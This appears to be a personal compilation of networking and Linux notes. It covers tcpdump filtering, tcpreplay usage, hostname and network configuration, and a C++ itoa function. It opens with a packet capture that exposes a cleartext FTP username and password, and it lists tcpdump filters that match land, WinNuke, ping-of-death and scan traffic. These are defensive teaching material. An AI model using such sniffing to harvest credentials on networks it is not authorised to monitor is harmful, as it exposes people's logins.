20:53:24.879473 IP ubuntu.local.40205 > 192.168.1.2.ftp: . ack 1228937421 win 183 ....g.I@............. ........
20:53:24.881654 IP ubuntu.local.40205 > 192.168.1.2.ftp: . ack 43 win 183 [email protected]..... ......EN
20:53:26.402046 IP ubuntu.local.40205 > 192.168.1.2.ftp: P 0:10(10) ack 43 win 183 ....g.I@......`$..... ...=..EN
USER teddybear
20:53:26.403802 IP ubuntu.local.40205 > 192.168.1.2.ftp: . ack 76 win 183 ....h.I@............. ...>..E^
20:53:29.169036 IP ubuntu.local.40205 > 192.168.1.2.ftp: P 10:25(15) ack 76 win 183 ....h.I@......#c..... ......E^
PASS wakeup
20:53:29.171553 IP ubuntu.local.40205 > 192.168.1.2.ftp: . ack 96 win 183 ....h.I@.,........... ......Ez
20:53:29.171649 IP ubuntu.local.40205 > 192.168.1.2.ftp: P 25:31(6) ack 96 win 183 ....h.I@.,........... ......Ez
SYST
20:53:29.211607 IP ubuntu.local.40205 > 192.168.1.2.ftp: . ack 115 win 183 ....h.I@.?.....j..... ......Ez
20:53:31.367619 IP ubuntu.local.40205 > 192.168.1.2.ftp: P 31:37(6) ack 115 win 183 ....h.I@.?........... ......Ez
QUIT
20:53:31.369316 IP ubuntu.local.40205 > 192.168.1.2.ftp: . ack 155 win 183 [email protected]........... ......E.
20:53:31.369759 IP ubuntu.local.40205 > 192.168.1.2.ftp: F 37:37(0) ack 156 win 183 [email protected]..... ......E.

We see in this capture the FTP username (teddybear) and password (wakeup).


Complete list of byte offsets for filtering with TCPDump ( Linux )

After wandering the net for TCPDump papers, I've found some quite good info for those dealing with large traffic log files: TCPDump bit masking. Filtering with TCPDump using bit masking turns out to be good practice (and also very helpful) for anyone seeking solid knowledge of tcpdump's applicability.

If you do a search on bit masking you will find more information on this subject.

Expressions Code:

[x:y]        start at offset x from the beginning of the packet and read y bytes
[x]          abbreviation for [x:1]
proto[x:y]   start at offset x into the proto header and read y bytes

p[x:y] & z = 0    p[x:y] has none of the bits selected by z
p[x:y] & z != 0   p[x:y] has any of the bits selected by z
p[x:y] & z = z    p[x:y] has all of the bits selected by z
p[x:y] = z        p[x:y] has only the bits selected by z
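These four bitmask relations can be tried out directly in Python; here p13 stands in for a captured tcp[13] flags byte (the 0x12 value, a SYN-ACK, is chosen purely for illustration):

```python
# Sketch of the four bitmask relations applied to a TCP flags byte.
# 0x12 is a SYN-ACK: SYN = 0x02, ACK = 0x10.
p13 = 0x12

print(p13 & 0x01 == 0)      # "none of": FIN (0x01) is not set -> True
print(p13 & 0x03 != 0)      # "any of":  SYN or FIN set (SYN is) -> True
print(p13 & 0x12 == 0x12)   # "all of":  both SYN and ACK set -> True
print(p13 == 0x12)          # "only":    exactly SYN and ACK, nothing else -> True
```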

IP byte offsets Code:

ip[0] & 0xf0       - IP version (high nibble)
ip[0] & 0x0f       - internet header length (in 32-bit words)
ip[1]              - TOS
ip[2:2]            - total length
ip[4:2]            - IP identification
ip[6] & 0xe0       - IP flags
ip[6:2] & 0x1fff   - fragment offset area
ip[8]              - TTL
ip[9]              - protocol field
ip[10:2]           - header checksum
ip[12:4]           - src IP address
ip[16:4]           - dst IP address
ip[20:3]           - options
ip[24]             - padding
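As a quick illustration of the two nibbles packed into ip[0], a minimal Python sketch (the 0x45 sample byte is a typical IPv4 first byte, assumed for illustration):

```python
# Sketch: extract version and header length from ip[0] with the masks above.
ip0 = 0x45   # typical IPv4 first byte: version 4, IHL 5 (5 * 4 = 20 bytes)

version = (ip0 & 0xf0) >> 4   # high nibble: IP version
ihl_words = ip0 & 0x0f        # low nibble: header length in 32-bit words

print(version, ihl_words * 4)   # → 4 20
```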

TCP byte offsets Code:

tcp[0:2]         - src port
tcp[2:2]         - dst port
tcp[4:4]         - seq number
tcp[8:4]         - ack number
tcp[12] & 0xf0   - data offset (high nibble)
tcp[12] & 0x0f   - reserved
tcp[13]          - tcp flags

tcp[13] & 0x3f = 0      - no flags set (null packet)
tcp[13] & 0x11 = 1      - FIN set and ACK not set
tcp[13] & 0x03 = 3      - SYN set and FIN set
tcp[13] & 0x05 = 5      - RST set and FIN set
tcp[13] & 0x06 = 6      - SYN set and RST set
tcp[13] & 0x18 = 8      - PSH set and ACK not set
tcp[13] & 0x30 = 0x20   - URG set and ACK not set
tcp[13] & 0xc0 != 0     - at least one of the reserved bits of tcp[13] is set
tcp[14:2]               - window
tcp[16:2]               - checksum


tcp[18:2]   - urgent pointer
tcp[20:3]   - options
tcp[23]     - padding
tcp[24]     - data

Detail on Flags:

Flags        Numerically          Meaning
=====        ===========          =======
---- --S-    0000 0010 = 0x02     normal syn
---A --S-    0001 0010 = 0x12     normal syn-ack
---A ----    0001 0000 = 0x10     normal ack
--UA P---    0011 1000 = 0x38     psh-urg-ack. interactive stuff like ssh
---A -R--    0001 0100 = 0x14     rst-ack. it happens.
---- --SF    0000 0011 = 0x03     syn-fin scan
--U- P--F    0010 1001 = 0x29     urg-psh-fin. nmap fingerprint packet
-Y-- ----    0100 0000 = 0x40     anything >= 0x40 has a reserved bit set
XY-- ----    1100 0000 = 0xC0     both reserved bits set
XYUA PRSF    1111 1111 = 0xFF     FULL_XMAS scan
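The hex values in this table fall out of OR-ing the individual flag bits of tcp[13]; a small Python check (the variable names are mine, not tcpdump syntax):

```python
# Sketch: derive the table's hex values from the individual TCP flag bits.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

assert SYN == 0x02                 # normal syn
assert ACK | SYN == 0x12           # normal syn-ack
assert ACK == 0x10                 # normal ack
assert URG | ACK | PSH == 0x38     # psh-urg-ack
assert ACK | RST == 0x14           # rst-ack
assert SYN | FIN == 0x03           # syn-fin scan
assert URG | PSH | FIN == 0x29     # urg-psh-fin (nmap fingerprint packet)
print("all flag values check out")
```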

UDP byte offsets Code:

udp[0:2]   - src port
udp[2:2]   - dst port
udp[4:2]   - length
udp[6:2]   - checksum
udp[8:4]   - first 4 octets of data

ICMP byte offsets Code:

icmp[0]     - type
icmp[1]     - code
icmp[2:2]   - checksum

Destination Unreachable: icmp[0] = 0x3 (3)

icmp[4:4]   - unused (per RFC)
icmp[8:4]   - internet header + 64 bits of original data
icmp[1]     - 0 = net unreachable
            - 1 = host unreachable
            - 2 = protocol unreachable
            - 3 = port unreachable
            - 4 = fragmentation needed and DF set
            - 5 = source route failed

Time Exceeded: icmp[0] = 0xB (11)   

icmp[4:4]   - unused (per RFC)
icmp[8:4]   - internet header + 64 bits of original data
icmp[1]     - 0 = TTL exceeded in transit
            - 1 = fragment reassembly time exceeded

Parameter Problem: icmp[0] = 0xC (12)   

icmp[1]     - 0 = pointer indicates error
icmp[4]     - pointer
icmp[5:3]   - unused, per RFC
icmp[8:4]   - internet header + 64 bits of original data


Source Quench: icmp[0] = 0x4 (4)

icmp[1]     - 0 = may be received by gateway or host
icmp[4:4]   - unused, per RFC
icmp[8:4]   - internet header + 64 bits of original data

Redirect Message: icmp[0] = 0x5 (5)

icmp[1]     - 0 = redirect for network
            - 1 = redirect for host
            - 2 = redirect for TOS & network
            - 3 = redirect for TOS & host
icmp[4:4]   - gateway internet address
icmp[8:4]   - internet header + 64 bits of original data

Echo/Echo Reply: icmp[0] = 0x0 (0) (echo reply); icmp[0] = 0x8 (8) (echo request)

icmp[4:2]    - identifier
icmp[6:2]    - sequence number
icmp[8]      - data begins

Timestamp/Timestamp Reply: icmp[0] = 0xD (13) (timestamp request); icmp[0] = 0xE (14) (timestamp reply)

icmp[1]      - 0
icmp[4:2]    - identifier
icmp[6:2]    - sequence number
icmp[8:4]    - originate timestamp
icmp[12:4]   - receive timestamp
icmp[16:4]   - transmit timestamp

Information Request/Reply: icmp[0] = 0xF (15) (info request) icmp[0] = 0x10  (16) (info reply)

icmp[1]     - 0
icmp[4:2]   - identifier
icmp[6:2]   - sequence number
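The identifier/sequence offsets above can be demonstrated by packing a minimal ICMP echo-request header in Python and indexing it the same way the icmp[] expressions do (the field values here are made up for illustration):

```python
# Sketch: pull the icmp[] fields out of a raw ICMP echo-request header
# using the byte offsets listed above.
import struct

# type=8 (echo request), code=0, checksum, identifier, sequence number
pkt = struct.pack("!BBHHH", 8, 0, 0xF7FF, 0x1234, 1)

icmp_type = pkt[0]                             # icmp[0]
icmp_code = pkt[1]                             # icmp[1]
checksum  = struct.unpack("!H", pkt[2:4])[0]   # icmp[2:2]
ident     = struct.unpack("!H", pkt[4:6])[0]   # icmp[4:2]
seq       = struct.unpack("!H", pkt[6:8])[0]   # icmp[6:2]

print(icmp_type, icmp_code, hex(ident), seq)   # → 8 0 0x1234 1
```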

Address Mask Request/Reply: icmp[0] = 0x11 (17) (address mask request); icmp[0] = 0x12 (18) (address mask reply)

Examples...: Code:

is some kind of SYN-FIN (tcp[13] & 0x03) = 3

land attack ip[12:4] = ip[16:4]

winnuke (tcp[2:2] = 139) && (tcp[13] & 0x20 != 0) && (tcp[19] & 0x01 = 1)

things other than ACK/PSH (tcp[13] & 0xe7) != 0


initial fragments (ip[6] & 0x20 != 0) && (ip[6:2] & 0x1fff = 0)

intervening fragments (ip[6] & 0x20 != 0) && (ip[6:2] & 0x1fff != 0)

terminal fragments (ip[6] & 0x20 = 0) && (ip[6:2] & 0x1fff != 0)

has ip options (ip[0] & 0x0f) != 5

ping o' death and its ilk ((ip[6] & 0x20 = 0) && (ip[6:2] & 0x1fff != 0)) && \ (65535 < (ip[2:2] + 8*(ip[6:2] & 0x1fff)))
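A Python sketch of the same test, assuming frag_field holds the 16-bit ip[6:2] value and total_len holds ip[2:2] (the function and argument names are my own, for illustration only):

```python
# Sketch: the "ping o' death" test evaluated for a single terminal fragment.
def ping_of_death(frag_field, total_len):
    """True if a last fragment would reassemble to more than 65535 bytes."""
    mf_clear = (frag_field & 0x2000) == 0   # same bit as ip[6] & 0x20 on the high byte
    off = frag_field & 0x1fff               # 13-bit offset, in 8-byte units
    return mf_clear and off != 0 and 65535 < total_len + 8 * off

# A final fragment at offset 8190*8 = 65520 plus a 60-byte piece
# overflows the 65535-byte maximum datagram size:
print(ping_of_death(0x1FFE, 60))   # → True
print(ping_of_death(0x0000, 60))   # → False (not a fragment at all)
```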

You can grab source information here: http://packet.node.to/hacks/byte_offsets.txt

Enjoy.

Some invocations I commonly use:

[root@DRMU_DR receiverFON]# tcpdump -xX -s0 -i eth1 udp[8:4]=0x6492004c and src 193.168.8.241 and dst 225.168.8.76 and port 20767

tcpdump -s0 -i eth1 udp and src xxx.yyy.www.zzz -w <FILENAME>

[-s0 prevents packets from being truncated at 68 bytes]


tcpreplay ( Linux )

From: http://tcpreplay.synfin.net/trac/wiki/tcpreplay

Overview

tcpreplay has evolved quite a bit over the years. In the 1.x days, it merely read packets and sent them back on the wire. In 2.x, tcpreplay was enhanced significantly to add various rewriting functionality, but at the cost of complexity, performance and bloat. Now in 3.x, tcpreplay has returned to its roots to be a lean packet sending machine; the editing functions have moved to tcprewrite, and a powerful tcpreplay-edit combines the two.

Basic Usage

To replay a given pcap as it was captured, all you need to do is specify the pcap file and the interface to send the traffic out of, in this case 'eth0':

# tcpreplay --intf1=eth0 sample.pcap

Replaying at different speeds

You can also replay the traffic at different speeds than it was originally captured at. Some examples:

To replay traffic as quickly as possible:

# tcpreplay --topspeed --intf1=eth0 sample.pcap

To replay traffic at a rate of 10Mbps:

# tcpreplay --mbps=10.0 --intf1=eth0 sample.pcap

To replay traffic 7.3 times as fast as it was captured:

# tcpreplay --multiplier=7.3 --intf1=eth0 sample.pcap

To replay traffic at half-speed:

# tcpreplay --multiplier=0.5 --intf1=eth0 sample.pcap

To replay at 25 packets per second:

# tcpreplay --pps=25 --intf1=eth0 sample.pcap

To replay packets one at a time while decoding them (useful for debugging purposes):

# tcpreplay --oneatatime --verbose --intf1=eth0 sample.pcap

Replaying files multiple times

Using the loop flag you can specify that a pcap file will be sent two or more times:

To replay the sample.pcap file 10 times:


# tcpreplay --loop=10 --intf1=eth0 sample.pcap

To replay sample.pcap infinitely, or until CTRL-C is pressed:

# tcpreplay --loop=0 --intf1=eth0 sample.pcap

If the pcap files you are looping are small enough to fit in available RAM, consider using the --enable-file-cache option. This option caches each packet in RAM so that subsequent reads don't have to hit the slower disk. It does have a slight performance hit for the first iteration of the loop since it has to call malloc() for each packet, but after that it seems to improve performance by around 5-10%. Of course if you don't have enough free RAM, then this will cause your system to swap which will dramatically decrease performance.

Another useful option is --quiet. This suppresses printing out to the screen each time tcpreplay starts a new iteration. This can have a dramatic performance boost for systems with slower consoles.

Advanced Usage

Splitting Traffic Between Two Interfaces

By utilizing tcpprep cache files, tcpreplay can split traffic between two interfaces. This allows tcpreplay to send traffic through a device and emulate both client and server sides of the connection, thereby maintaining state. Using a tcpprep cache file to split traffic between two interfaces (eth0 & eth1) with tcpreplay is simple:

# tcpreplay --cachefile=sample.prep --intf1=eth0 --intf2=eth1 sample.pcap

Viewing Packets as They are Sent

The --verbose flag turns on basic tcpdump decoding of packets. If you would like to alter the way tcpreplay invokes tcpdump to decode packets, then you can use the --decode flag. Note: Use of the --verbose flag is not recommended when performance is important. Please see the tcpdump(1) man page for options to pass to the --decode flag.

Choosing a Timing Method

tcpreplay as of v3.3.0 now supports multiple methods for creating delays between two packets.

First a refresher:

There are 1,000 milliseconds (msec) in 1 second
There are 1,000,000 microseconds (usec) in 1 second
There are 1,000,000,000 nanoseconds (nsec) in 1 second

And a little math:

Let's say you want to send 125,000 packets/sec (pps). That means you need to send a packet on average every 8usec. That's doable on most hardware, assuming you can find a timing method with 1usec accuracy. The problem gets a lot more difficult when you want to send at 130,000 pps: now you need a 7.7usec delay, requiring .1usec accuracy! That's a 10x increase in accuracy for a small change in performance. Most timing methods on general purpose hardware/software can't do that.
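The arithmetic here is easy to check; a small Python sketch (the function name is mine):

```python
# Sketch: the average inter-packet delay, in microseconds, needed to
# sustain a given packets/sec rate.
def delay_usec(pps):
    return 1_000_000 / pps

print(delay_usec(125_000))   # → 8.0
print(delay_usec(130_000))   # ~7.69usec, needing sub-microsecond accuracy
```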

So what are the expected accuracies of each timing method?


nanosleep() - Theoretically 1nsec accuracy, but is probably closer to 1usec. Can be off by up to +/- 10msec depending on the operating system.

gettimeofday() - 1usec accuracy at best
OS X's AbsoluteTime() - 1nsec accuracy
select() - Theoretically 1usec accuracy, but tends to be off by +/- 10msec
IO Port 80 - 1usec accuracy, but can cause crashes with certain versions of hardware/OS's
Intel/AMD/SPARC RDTSC - Theoretically better than 1usec accuracy, but many recent multi-core Intel CPUs are horribly inaccurate and unusable
Intel HPET - A 10MHz timer giving .1usec accuracy

As you can see above, only AbsoluteTime and the HPET provide the necessary resolution to hit our 130,000pps mark. Hence, if you're using one of the other methods, I'll use weighted averages or rounding to provide better accuracy. What that means is, when each packet is being sent at a constant rate (packets/sec), I'll sleep 8usec 7 times and then 7usec 3 times to average out to the necessary 7.7usec. If you're using a variable timing method (Mbps or multiplier), then I'll round to the nearest 1usec (8usec in this 7.7usec case); the hope is that over many packets it will average out correctly.
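The weighted-average trick can be verified in a couple of lines of Python:

```python
# Sketch: sleeping 8usec 7 times and 7usec 3 times averages out to the
# 7.7usec target described above.
sleeps = [8] * 7 + [7] * 3
print(sum(sleeps) / len(sleeps))   # → 7.7
```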

AbsoluteTime

So what does this all mean? Well, if you're running OS X, then using --timer=abstime is the clear winner. After that it gets more complicated. AbsoluteTime is currently the only timing method which doesn't need weighted averages or rounding.

HPET/gettimeofday

First, tcpreplay currently doesn't have native support for the Intel HPET. The good news is that some operating systems (like recent Linux kernels) use the HPET for calls to gettimeofday(). So while you lose some accuracy (gettimeofday() is limited to 1usec accuracy no matter what the underlying implementation looks like), it's probably the best option for non-OS X users. If your gettimeofday() isn't backed by the HPET, you can still use it, just realize it might be a bit unreliable. Even if your gettimeofday() uses the HPET, you still only get 1usec accuracy, so the part about weighted averages and rounding still applies. Specify --timer=gtod to use gettimeofday().

nanosleep

Some implementations of nanosleep() are good, others are horrible; it may even depend on how long you're sleeping, since the implementation might switch between going to sleep (bad) and using a tight loop (good). Generally speaking it's worth trying: --timer=nano

RDTSC

Using the RDTSC via --timer=rdtsc. This tends to work great on some hardware and is completely worthless for others. I've got an Intel P4 3.2Ghz box which it works great on, but my Core2Duo MacBook Pro is really bad. If you don't specify a --rdtsc-clicks value, tcpreplay will introduce a short delay on startup in order to calculate this value. If your hardware has a properly working RDTSC it's usually the speed of the processor (expressed in Mhz, so a 3.2Ghz CPU == --rdtsc-clicks=3200) or a fraction thereof.

IO Port 80

I don't have much experience with this, so give it a try and let me know what you find: --timer=ioport

select

This is crap for 99% of the situations out there. Hence you probably don't want to specify --timer=select


Accelerating Time

Regardless of which timing method you use, you can try specifying --sleep-accel to reduce the amount of time to sleep in usec. I've found this is useful for providing a "fudge factor" in some cases.

Tuning for High-Performance

Choosing a Packet Interval Method

The first recommendation is simple, use: --topspeed. This will always be the fastest method to send packets. If however you need some level of control, using --pps to specify packets/second is recommended. Using --pps-multi will cause multiple packets to be sent between each sleep interval, thus providing higher throughput potential than just --pps alone, but at the cost of the traffic being more "spikey" than flat. Higher --pps-multi values improve performance and make the traffic more "spikey".

Using --mbps or --multiplier for high performance situations is not recommended as the overhead for calculating packet intervals tends to limit real world throughput.

Tuning your Operating System/Hardware

Regardless of the size of physical memory, UNIX kernels will only allocate a static amount for network buffers. This includes packets sent via the "raw" interface, like with tcpreplay. Most kernels will allow you to tweak the size of these buffers, drastically increasing performance and accuracy.

NOTE: The following information is provided based upon my own experiences or the reported experiences of others. Depending on your operating system and specific hardware, it may or may not work for you. It may even make your system horribly unstable, corrupt your hard drive, or worse.

NOTE: Different operating systems, network card drivers, and even hardware can have an effect on the accuracy of packet timestamps that tcpdump or other capture utilities generate. And as you know: garbage in, garbage out.

NOTE: If you have information on tuning the kernel of an operating system not listed here, please send it to me so I can include it.

General Tips

1. Use a good network card. This is probably the most important buying decision you can make. I recommend Intel e1000 series cards. El-cheapo cards like Realtek are known to give really crappy performance.

2. Tune your OS. See below for recommendations.
3. Faster is better. If you want really high performance, make sure your disk I/O, CPU and the like are up to the task.
4. For more details, check out the FAQ.
5. If you're looping file(s), make sure you have enough free RAM for the pcap file(s) and use --enable-file-cache.
6. Use --quiet.
7. Use --topspeed or --pps and a high value for --pps-multi.
8. Use tcprewrite to pre-process all the packet editing instead of using tcpreplay-edit.

Linux


The following is known to apply to the 2.4.x and 2.6.x series of kernels. By default Linux's tcpreplay performance isn't all that stellar. However, with a simple tweak, relatively decent performance can be had on the right hardware. By default, Linux specifies a 64K buffer for sending packets. Increasing this buffer to about half a megabyte does a good job:

echo 524287 >/proc/sys/net/core/wmem_default
echo 524287 >/proc/sys/net/core/wmem_max
echo 524287 >/proc/sys/net/core/rmem_max
echo 524287 >/proc/sys/net/core/rmem_default

On one system, we've seen a jump from 23.02 megabits/sec (5560 packets/sec) to 220.30 megabits/sec (53212 packets/sec) which is nearly a 10x increase in performance. Depending on your system and capture file, different numbers may provide different results.

*BSD

*BSD systems typically allow you to specify the size of network buffers with the NMBCLUSTERS option in the kernel config file. Experiment with different sizes to see which yields the best performance. See the options(4) man page for more details.

Miche:

I used the following commands to record and replay:

tcpdump –s0 –i eth1 udp and src xxx.yyy.www.zzz –w <NOMEFILE>

[-s0 serve a non avere i pacchetti spezzati a 68]

tcpreplay –i eth1 <NOMEFILE>

Su fddi ci sono dei problemi in quanto andrebbe definito l’header usato per il trasporto su quel layer.

Page 29: Appunti Informatica

Setting the Linux Host Name (Updated February 12, 2004)

Checking your Linux host name

First, see if your host name is set correctly using the following commands:

uname -n
hostname -a
hostname -s
hostname -d
hostname -f
hostname

If the above commands return correctly with no errors then all may be well; however, you may want to read on to verify that all settings are correct.

Configuring /etc/hosts

If your IP address is assigned to you by a DHCP server, then /etc/hosts is configured as follows:

127.0.0.1 mybox.mydomain.com localhost.localdomain localhost mybox

If you have a static IP address, then /etc/hosts is configured as follows:

127.0.0.1 localhost.localdomain localhost
192.168.0.10 mybox.mydomain.com mybox

Setting the Host Name using "hostname"

After updating the /etc/hosts file correctly, the "hostname" command should be run as follows to set your hostname:

hostname mybox.mydomain.com

Checking /etc/HOSTNAME (if present)

You may or may not have the file /etc/HOSTNAME; if present, it should contain the fully qualified host name:

mybox.mydomain.com

Checking /etc/sysconfig/network

If you have a static IP address, then /etc/sysconfig/network is configured as follows:

NETWORKING=yes
HOSTNAME="mybox.mydomain.com"
...

Page 30: Appunti Informatica

If your IP address is assigned to you by a DHCP server, and you wish to update the local DNS server through Dynamic DNS, then /etc/sysconfig/network is configured as follows:

NETWORKING=yes
HOSTNAME="mybox.mydomain.com"
DHCP_HOSTNAME="mybox.mydomain.com"
...

It makes more sense to move the "DHCP_HOSTNAME" variable into /etc/sysconfig/network-scripts/ifcfg-eth0 (or the appropriate NIC config file), so the above section has been moved; see below. With only one NIC the struck section above works fine, but with more than one NIC it makes no sense there. The same may be true of the "HOSTNAME" line; perhaps it too should move into /etc/sysconfig/network-scripts/ifcfg-eth0. I will investigate further. By default RHL places HOSTNAME=localhost.localdomain in /etc/sysconfig/network.

Checking /proc/sys/kernel/hostname

This is checked with the following command:

cat /proc/sys/kernel/hostname

If you need to set this file, you can either reboot or set it now with the following command:

echo mybox.mydomain.com > /proc/sys/kernel/hostname

Dynamic DNS - Updating the local DNS server with your host name and DHCP IP

For Red Hat Linux, if you receive your IP address from a DHCP server, you may update the local DNS server by adding the following line to the correct ifcfg file in /etc/sysconfig/network-scripts, such as ifcfg-eth0 or ifcfg-eth1:

DHCP_HOSTNAME="mybox.mydomain.com"

or if running Debian, edit /etc/network/interfaces as follows (adding the hostname line):

iface eth0 inet dhcp
    hostname mybox.mydomain.com

Updated information about DDNS: kill the dhclient process ("killall dhclient") and make sure it is gone, then restart networking: "service network restart".

Updated information for DDNS on Gentoo:

killall dhclient

Edit /etc/conf.d/net, uncommenting and modifying the line as follows:

dhcpcd_eth0="-h yourhostname"

Then reboot or restart your network subsystem.

Thanks to Jack for the Gentoo information!

For more info on Debian, see "man interfaces" and scroll down to "The dhcp Method".

WINS - Updating the local WINS server with your host name and IP

Page 31: Appunti Informatica

If you wish to update the local WINS server, use SAMBA and configure it to point to the local WINS server: update the "wins server = " entry in /etc/samba/smb.conf with the WINS server addresses for your network. Be sure not to enable "wins support = yes", as that would make the Linux box itself a WINS server.

Changing the hostname while in X-Windows

Changing the hostname while in X-Windows can be problematic; most often, new windows cannot be opened. Either:

1. change the hostname while X-Windows is not running, or
2. change the hostname in X-Windows, then restart X-Windows.

Page 32: Appunti Informatica

Itoa (C/C++)

(Taken from http://www.jb.man.ac.uk/~slowe/cpp/itoa.html)

Arrgghh C/C++! It would appear that itoa() isn't ANSI C standard and doesn't work with GCC on Linux (at least the version I'm using). Things like this are frustrating especially if you want your code to work on different platforms (Windows/Linux/Solaris/whatever). Before we go any further, I would like to say thanks to the people that contributed to the solutions below.

Many people say that you should just use sprintf to write to a character string but that doesn't allow for one of the features of itoa(); the ability to write in a base other than 10. This page contains a series of evolving versions of an itoa implementation. The oldest are near the top and the newest at the bottom.

/**
 * C++ version, char* style "itoa":
 * (requires <cstdlib> for std::abs and <algorithm> for std::reverse)
 */
char* itoa( int value, char* result, int base ) {
    // check that the base is valid
    if (base < 2 || base > 16) { *result = 0; return result; }

    char* out = result;
    int quotient = value;
    do {
        *out = "0123456789abcdef"[ std::abs( quotient % base ) ];
        ++out;
        quotient /= base;
    } while ( quotient );

    // Only apply negative sign for base 10
    if ( value < 0 && base == 10) *out++ = '-';
    std::reverse( result, out );
    *out = 0;
    return result;
}

/**
 * C++ version, std::string style "itoa":
 * (requires <string>, <cstdlib> and <algorithm>)
 */
std::string itoa(int value, int base) {
    enum { kMaxDigits = 35 };
    std::string buf;
    buf.reserve( kMaxDigits ); // Pre-allocate enough space.

    // check that the base is valid
    if (base < 2 || base > 16) return buf;

    int quotient = value;
    // Translating number to string with base:
    do {
        buf += "0123456789abcdef"[ std::abs( quotient % base ) ];
        quotient /= base;
    } while ( quotient );

    // Append the negative sign for base 10
    if ( value < 0 && base == 10) buf += '-';
    std::reverse( buf.begin(), buf.end() );
    return buf;
}

Page 33: Appunti Informatica

TCP/IP Network Configuration Files:

File: /etc/resolv.conf - host name resolver configuration file

search name-of-domain.com   - Name of your domain or ISP's domain if using their name server
nameserver XXX.XXX.XXX.XXX  - IP address of primary name server
nameserver XXX.XXX.XXX.XXX  - IP address of secondary name server

This configures Linux so that it knows which DNS server will be resolving domain names into IP addresses. If using DHCP client, this will automatically be sent to you by the ISP and loaded into this file as part of the DHCP protocol. If using a static IP address, ask the ISP or check another machine on your network.

File: /etc/hosts - locally resolve node names to IP addresses

127.0.0.1 your-node-name.your-domain.com localhost.localdomain localhost
XXX.XXX.XXX.XXX node-name

Note when adding hosts to this file, place the fully qualified name first (it helps sendmail identify your server correctly), i.e.:

XXX.XXX.XXX.XXX superserver.yolinux.com superserver

This informs Linux of local systems on the network which are not handled by the DNS server (or of all systems in your LAN if you are not using DNS or NIS).

File: /etc/sysconfig/network

Red Hat network configuration file used by the system during the boot process.

File: /etc/nsswitch.conf - System Databases and Name Service Switch configuration file

hosts: files dns nisplus nis

This example tells Linux to first resolve a host name by looking at the local hosts file (/etc/hosts), then, if the name is not found, to look to your DNS server as defined by /etc/resolv.conf, and if not found there, to look to your NIS server.

In the past this file has had the following names: /etc/nsswitch.conf, /etc/svc.conf, /etc/netsvc.conf, ... depending on the distribution.
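The lookup order encoded in the "hosts:" line can be extracted mechanically. A small sketch (parse_hosts_sources is an illustrative helper, not a standard tool; the sample line is the one from the text above):

```shell
# Print the resolution order encoded in an nsswitch.conf "hosts:" line,
# one numbered source per output line.
parse_hosts_sources() {
    printf '%s\n' "$1" | awk -F':[ \t]*' '$1 == "hosts" {
        n = split($2, src, /[ \t]+/)
        for (i = 1; i <= n; i++) print i ": " src[i]
    }'
}
parse_hosts_sources 'hosts: files dns nisplus nis'
# prints: 1: files / 2: dns / 3: nisplus / 4: nis
```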

File: /etc/sysconfig/network-scripts/ifcfg-eth0 - Configuration settings for your first ethernet port (0). Your second port is eth1.

File: /etc/modules.conf (or for older systems: /etc/conf.modules) Example statement for Intel ethernet card:

alias eth0 eepro100

Modules for other devices on the system will also be listed. This tells the kernel which device driver to use if configured as a loadable module. (default for Red Hat)

Fedora / Red Hat Network GUI Configuration Tools:

The following GUI tools edit the system configuration files. There is no difference between a configuration developed with the GUI tools and one developed by editing the system configuration files directly.

Page 34: Appunti Informatica

TCP/IP ethernet configuration:

Network configuration (GUI):
  /usr/sbin/system-config-network (FC-2/3)
  /usr/bin/redhat-config-network (/usr/bin/neat) (RH 7.2+ - FC-1)

Text console configuration tool:
  /usr/sbin/system-config-network-tui (Fedora Core 2/3)
  /usr/bin/redhat-config-network-tui (RH 9.0 - FC-1)

Text console network configuration tool, first interface (eth0) only:
  /usr/sbin/netconfig

/usr/bin/netcfg (GUI) (last available with RH 7.1)

Gnome Desktop Network Configuration:
  /usr/bin/gnome-network-preferences (RH 9.0 - FC-3)
  Proxy configuration. Choose one of three options:
  1. Direct internet connection
  2. Manual proxy configuration (specify proxy and port)
  3. Automatic proxy configuration (give URL)

Assigning an IP address:

Computers may be assigned a static IP address or assigned one dynamically.

Static IP address assignment:

Choose one of the following methods:

Command line:

/sbin/ifconfig eth0 192.168.10.12 netmask 255.255.255.0 broadcast 192.168.10.255

Network address by convention would be the lowest: 192.168.10.0
Broadcast address by convention would be the highest: 192.168.10.255
The gateway can be anything, but following convention: 192.168.10.1

Note: the highest and lowest addresses are based on the netmask. The previous example is based on a netmask of 255.255.255.0.

GUI tools:

Page 35: Appunti Informatica

o /usr/bin/neat - Gnome GUI network administration tool. Handles all interfaces. Configure for static IP or DHCP client. (First available with Red Hat 7.2.)
o /usr/bin/netcfg - Handles all interfaces. (Last available in Red Hat 7.1.)
o Console tool: /usr/sbin/netconfig (only seems to work for the first network interface eth0, not eth1, ...)
o Directly edit the configuration files/scripts. See format below.

The ifconfig command does NOT store this information permanently; upon reboot it is lost. (Manually add the commands to the end of the file /etc/rc.d/rc.local to execute them upon boot.) The commands netcfg and netconfig make permanent changes to the system network configuration files located in /etc/sysconfig/network-scripts/, so that the information is retained. The IANA has allocated IP addresses in the range 192.168.0.0 to 192.168.255.255 for private networks.

Helpful tools:
  Cisco's IP Subnet calculator
  CIDR Conversion table - CIDR values, masks etc.

The Red Hat configuration tools store the configuration information in the file /etc/sysconfig/network. They will also allow one to configure routing information.

File: /etc/sysconfig/network

Static IP address Configuration: (Configure gateway address)

NETWORKING=yes
HOSTNAME=my-hostname        - Hostname is defined here and by the command hostname
FORWARD_IPV4=true           - True for NAT firewall gateways and Linux routers. False for everyone else: desktops and servers.
GATEWAY="XXX.XXX.XXX.YYY"   - Used if your network is connected to another network or the internet. Static IP configuration. The gateway is not defined here for a DHCP client.

OR for DHCP client configuration:

NETWORKING=yes
HOSTNAME=my-hostname        - Hostname is defined here and by the command hostname

(Gateway is assigned by DHCP server.)

File (Red Hat/Fedora): /etc/sysconfig/network-scripts/ifcfg-eth0 (S.u.s.e.: /etc/sysconfig/network/ifcfg-eth-id-XX:XX:XX:XX:XX)

Static IP address configuration:

DEVICE=eth0
BOOTPROTO=static
BROADCAST=XXX.XXX.XXX.255
IPADDR=XXX.XXX.XXX.XXX
NETMASK=255.255.255.0
NETWORK=XXX.XXX.XXX.0
ONBOOT=yes

OR for DHCP client configuration:

DEVICE=eth0
ONBOOT=yes
BOOTPROTO=dhcp

Page 36: Appunti Informatica

(Used by the script /etc/sysconfig/network-scripts/ifup to bring the various network interfaces on-line.) To disable DHCP, change BOOTPROTO=dhcp to BOOTPROTO=none.

In order for updated information in any of these files to take effect, one must issue the command: service network restart (or: /etc/init.d/network restart)
